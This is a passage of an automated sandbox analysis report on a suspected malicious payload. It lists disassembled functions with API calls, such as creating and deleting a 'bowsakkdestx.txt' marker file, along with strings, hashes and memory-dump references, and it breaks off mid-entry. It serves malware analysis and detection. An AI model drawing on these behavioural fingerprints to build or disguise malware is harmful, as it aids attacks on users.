                                                                                                                            Function 00477BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: a6204cd0b5564a8d1ccc89115c328ede6aabfd4149ac7a2c2b2114b85fe7d971
                                                                                                                            • Instruction ID: 3d27813f96c18325d77b53de33a320100ccf3a830b7a448b5caa3450280333c1
                                                                                                                            • Opcode Fuzzy Hash: a6204cd0b5564a8d1ccc89115c328ede6aabfd4149ac7a2c2b2114b85fe7d971
                                                                                                                            • Instruction Fuzzy Hash: 3E51E5317042049FDB25CE1CDD809AA77A6EF89304B64C91FF859CB341DB75EC518B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004829A9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __flsbuf__flush__getptd_noexit__write
                                                                                                                            • String ID: G
                                                                                                                            • API String ID: 3115901604-2458028032
                                                                                                                            • Opcode ID: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                                                                                                                            • Instruction ID: 48cbb1565c4e4db2fa6d0ef0fbec28ca869b109ac199fb4be486a97d847568f2
                                                                                                                            • Opcode Fuzzy Hash: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                                                                                                                            • Instruction Fuzzy Hash: FE41C670B006069FDB2CAEA9CA8056F77A5BF44360B14892FE815C7380DBF8DD819B58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00474160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: da96a5660da9895edc2236e888aecd59f6632275cdf126207958f5b4112cd0e1
                                                                                                                            • Instruction ID: 5f99cd289d604d68bf5f3492483e84ef7573edcb51cd1377e6ec1013d2ac2499
                                                                                                                            • Opcode Fuzzy Hash: da96a5660da9895edc2236e888aecd59f6632275cdf126207958f5b4112cd0e1
                                                                                                                            • Instruction Fuzzy Hash: D5312A31300104ABDB24EE4CCC859BB77A6EBC17507608A5EF869CB782D735ED518BAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004BAD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: .\crypto\buffer\buffer.c$C7L
                                                                                                                            • API String ID: 2102423945-2563974722
                                                                                                                            • Opcode ID: b63b64def75f4b19ebcf6d1bb6115a4758b79b3b8c2d108ea492648dfd34b2a0
                                                                                                                            • Instruction ID: 6f557642a2fad1dbe27ebd17fd7dd6eb5eb0e9abeae4b16b15aa5be2b0ccf5ac
                                                                                                                            • Opcode Fuzzy Hash: b63b64def75f4b19ebcf6d1bb6115a4758b79b3b8c2d108ea492648dfd34b2a0
                                                                                                                            • Instruction Fuzzy Hash: E421F8B5B442117BE2146669FC43B96B389EB94B18F10402BF718D76C1D2B4AC11C7E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • UuidCreate.RPCRT4(?), ref: 0046C5DA
                                                                                                                            • UuidToStringA.RPCRT4(?,00000000), ref: 0046C5F6
                                                                                                                            • RpcStringFreeA.RPCRT4(00000000), ref: 0046C640
                                                                                                                            Strings
                                                                                                                            • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0046C687
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUuid$CreateFree
                                                                                                                            • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                            • API String ID: 3044360575-2335240114
                                                                                                                            • Opcode ID: 8e4cfb4e7aa054f50a4e7caa812016fafd4e3133f1a9ad4cd76236b81a8c095c
                                                                                                                            • Instruction ID: bd0ce05f9f734096b249bb812e2112a8d1c054526c771fd0548c405df3255733
                                                                                                                            • Opcode Fuzzy Hash: 8e4cfb4e7aa054f50a4e7caa812016fafd4e3133f1a9ad4cd76236b81a8c095c
                                                                                                                            • Instruction Fuzzy Hash: D521DA71104341ABDB20DF24D8447AFBBE8AF91758F004E5FF4C987251E7B99509879B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C48B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C4A9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            • Opcode ID: 0113595b363478a68073076c84c94fa9c426f750ed7055e5cd667f69e74d14d6
                                                                                                                            • Instruction ID: 891837c4c45fb25d3009a6b719b51d231dbfb811e202d2855a75126dde14ff06
                                                                                                                            • Opcode Fuzzy Hash: 0113595b363478a68073076c84c94fa9c426f750ed7055e5cd667f69e74d14d6
                                                                                                                            • Instruction Fuzzy Hash: 9A01DB72A8022833D930B959AC47FFF775C9F62721F0004A7FE08D7141E5A5595A57D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0047BA4A
                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 0047BA73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassCursorLoadRegister
                                                                                                                            • String ID: 0$>V
                                                                                                                            • API String ID: 1693014935-1223471409
                                                                                                                            • Opcode ID: bb74f3c54658704bbace866974676c42b35c942acb980a2e058ea213cb8b0ed0
                                                                                                                            • Instruction ID: f7618bcf917664d3832e6fc0dbcdd84621b0f39d4714757821935f35a0716d90
                                                                                                                            • Opcode Fuzzy Hash: bb74f3c54658704bbace866974676c42b35c942acb980a2e058ea213cb8b0ed0
                                                                                                                            • Instruction Fuzzy Hash: 6DF0AFB0C042089BEB00DF90D9197DEBFB8BB08308F108559D4147A280D7BA1608CFE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C438
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C44E
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0046C45B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendDeleteFileFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 610490371-2616962270
                                                                                                                            • Opcode ID: 3151ce7c12c91161ad4312a1baf90d79a04bea5d9d538d33bd6deea06e118da4
                                                                                                                            • Instruction ID: f5f7cf742fda9b06be482443fc52f988e44efe5d681e16bdd18528c6a0b9ad00
                                                                                                                            • Opcode Fuzzy Hash: 3151ce7c12c91161ad4312a1baf90d79a04bea5d9d538d33bd6deea06e118da4
                                                                                                                            • Instruction Fuzzy Hash: D9E08675A4031C67EB30EBA0DC8AFE97B7CAF25B01F000492BB44D20C1E6B0E58D9B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove_strtok
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3446180046-0
                                                                                                                            • Opcode ID: c9e5a74d3399c0e1dce286f74d8cfcac624810d24b87839afbc47eaee42df925
                                                                                                                            • Instruction ID: 259ec4e9878978abf560886af48a686491fe6584adac54ead6fde3604a87719f
                                                                                                                            • Opcode Fuzzy Hash: c9e5a74d3399c0e1dce286f74d8cfcac624810d24b87839afbc47eaee42df925
                                                                                                                            • Instruction Fuzzy Hash: BC81CFB4900206EFEB14DF59C98079EBBF1FF14304F10492EE40657381E3BAAA54CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00482130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2974526305-0
                                                                                                                            • Opcode ID: cf66a750bedb6f5ba2027215b38929a94097dc17af3891ec01d9af7a23108488
                                                                                                                            • Instruction ID: 7398060686e13b2660a8def32edeb3b87e1c8b1daaabfdf85e30cfdfc4ed3a90
                                                                                                                            • Opcode Fuzzy Hash: cf66a750bedb6f5ba2027215b38929a94097dc17af3891ec01d9af7a23108488
                                                                                                                            • Instruction Fuzzy Hash: D251D830A00605ABCB24AFA9CA4456F77B1AF01320F248FAFF835963D0D7B89D518B59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0049C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0049C6AD
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 0049C6DB
                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0049C0ED,?,00BFBBEF,00000003), ref: 0049C709
                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0049C0ED,?,00BFBBEF,00000003), ref: 0049C73F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 1b7039e105c1c9c3a0927f41cde60433331195b7d63489761325293587bbe1a1
                                                                                                                            • Instruction ID: e7961784598594fc508076d8a1e50e96076bc2878b09f3bcbea49f19e27e69cc
                                                                                                                            • Opcode Fuzzy Hash: 1b7039e105c1c9c3a0927f41cde60433331195b7d63489761325293587bbe1a1
                                                                                                                            • Instruction Fuzzy Hash: 0031CE30600246AFDF219EA5CC84BAB7FA9BF41350F15847AE854872A0E734EC51DB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00527094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 005270AB
                                                                                                                              • Part of subcall function 005277A0: ___BuildCatchObjectHelper.LIBCMT ref: 005277D2
                                                                                                                              • Part of subcall function 005277A0: ___AdjustPointer.LIBCMT ref: 005277E9
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 005270C2
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 005270D4
                                                                                                                            • CallCatchBlock.LIBCMT ref: 005270F8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2901542994-0
                                                                                                                            • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                            • Instruction ID: aa83e36ecf1928e0c829979c4a0a4c0797398d587a358dcc9f9cd6b212a53b62
                                                                                                                            • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                            • Instruction Fuzzy Hash: D8010232000119BBCF12AF55EC09EDA3FAAFF8E714F158014F91862161D332E961EBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004853B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00485007: __getptd_noexit.LIBCMT ref: 00485008
